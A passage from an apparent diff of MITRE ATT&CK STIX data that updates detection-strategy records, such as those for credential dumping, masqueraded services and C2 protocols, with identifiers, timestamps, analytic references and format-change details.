+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--40b862cb-89a4-4200-baa0-bb171ecc2ce2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0836",
+                            "external_id": "DET0836"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malvertising",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--81f695b5-7621-4a82-8036-536c6687b5b4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5c228796-349e-4d7e-a3ca-51a5f8cbf294",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0845",
+                            "external_id": "DET0845"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--de93de79-3f24-4022-9b03-7228ffacca6f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--04f78d17-4599-4ecd-9a8f-f221ab2759cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0872",
+                            "external_id": "DET0872"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2a3b0030-05b4-4b85-a33c-dda07472f31f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3fa3299e-a8c2-4555-890b-544314ae1e44",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0439",
+                            "external_id": "DET0439"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Malware Relocation via Suspicious File Movement",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--143f3057-237e-427f-911a-2aa7d64721f0",
+                        "x-mitre-analytic--39aa9168-6f3b-4179-84f9-a6b8dcf90900",
+                        "x-mitre-analytic--72540cd1-3ba6-4a4a-8866-a3113094196a",
+                        "x-mitre-analytic--6b8a97fe-4e51-4409-9eab-f2795eb2ec74"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--45665335-5bf0-4553-9398-ea40d550cbff",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0117",
+                            "external_id": "DET0117"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Masqueraded Tasks or Services with Suspicious Naming and Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--51a23f35-4a11-4119-935a-1ffebcda2839",
+                        "x-mitre-analytic--5a9c1860-23ae-455e-bcab-0e0f91af5548",
+                        "x-mitre-analytic--7e3c05c9-5e49-416c-a0c9-eb7631ea5e7e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0602b47a-d37c-4eee-ac4b-b464060945ab",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0158",
+                            "external_id": "DET0158"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Msiexec Abuse for Local, Network, and DLL Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f27c0482-fbea-47a3-9b19-7302a058a9e5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d080a1b1-5ad1-45a1-8f7b-b736986c20d9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0215",
+                            "external_id": "DET0215"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Multi-Platform File Encryption for Impact",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1155df11-eee4-4fdf-a354-15eda0e90d4c",
+                        "x-mitre-analytic--b2f444b1-e434-40e1-9501-6b66a05a0201",
+                        "x-mitre-analytic--3b18d20b-94c7-41e7-8f82-99148945a74f",
+                        "x-mitre-analytic--203586e5-e178-4d41-bbae-93a86f04977b",
+                        "x-mitre-analytic--57d8fd27-9af5-4d01-9d1a-fdde8ec0c902"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d22f1848-fc32-4fdb-999b-9c0845fb6552",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0132",
+                            "external_id": "DET0132"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Mutex-Based Execution Guardrails Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1282f497-ce04-4151-9bd0-4eedbf4530b6",
+                        "x-mitre-analytic--7c0e4ffa-7f95-41de-9e3b-de2ad4a7a9ae",
+                        "x-mitre-analytic--4ab12b3f-5c6a-42a6-8d9c-c10b7e814986"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a97fe87f-e9be-4f71-8530-af5d70eaddf3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0586",
+                            "external_id": "DET0586"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of NTDS.dit Credential Dumping from Domain Controllers",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1c715030-9564-482d-98b7-22072bf28c97"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--31fef61c-301b-4a3d-aced-06632e321926",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0859",
+                            "external_id": "DET0859"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4384e648-0f49-442d-b989-6a47f2194130"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fb15f9a5-8561-4c67-b50b-f72039ff9a44",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0889",
+                            "external_id": "DET0889"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Network Security Appliances",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e1f67192-803a-4cd3-a455-64bb623263d6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1238c5f2-07ef-4a31-bc3a-e0cc0eb12516",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0819",
+                            "external_id": "DET0819"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Network Topology",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7101cd68-f6a2-4b7e-b19d-5d27b4c3b44c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d50064d2-b166-4da7-9f9b-b56b7cf16e0a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0828",
+                            "external_id": "DET0828"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Network Trust Dependencies",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--10222534-1e1d-473c-a2cb-674126f87ad8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2cb544af-ef54-4376-9608-b399ad67d3d6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0457",
+                            "external_id": "DET0457"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Non-Application Layer Protocols for C2",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4412fb07-9a44-49de-80af-8746b0be3865",
+                        "x-mitre-analytic--7d0a3871-8cee-47bd-8829-637e132c98f7",
+                        "x-mitre-analytic--4742e058-a301-47e1-b594-8daa8eabfc79",
+                        "x-mitre-analytic--cae917e6-7542-41d0-8b03-ad2b7ab1eb01",
+                        "x-mitre-analytic--688ed638-d3ba-47dc-baa7-16b16a9fe9c8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4e940cf7-b024-40d4-8b1f-f516588b08fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0850",
+                            "external_id": "DET0850"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Obtain Capabilities",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5697a257-0888-4fd5-84fd-756f6fa67690"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--80eb76bc-6599-4adf-8d8c-8126e7e63d12",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0040",
+                            "external_id": "DET0040"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Persistence Artifact Removal Across Host Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5882d2ff-289e-454d-9146-81306c154be3",
+                        "x-mitre-analytic--83a2f3c2-24c5-466d-8453-aa52802c2991",
+                        "x-mitre-analytic--81d64cae-ddd2-4512-9c8a-9a574b968c52",
+                        "x-mitre-analytic--c6ae166f-f2ac-405a-85c2-b7f9349a1b99"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--29fad4dd-d6d7-4a99-8ae8-060e6d0544ec",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0823",
+                            "external_id": "DET0823"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Phishing for Information",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--663bba48-7043-4407-875f-59691655d13c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ce0b969a-1411-4b6f-a6aa-c31ef6fe6727",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0081",
+                            "external_id": "DET0081"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Proxy Execution via Trusted Signed Binaries Across Platforms",
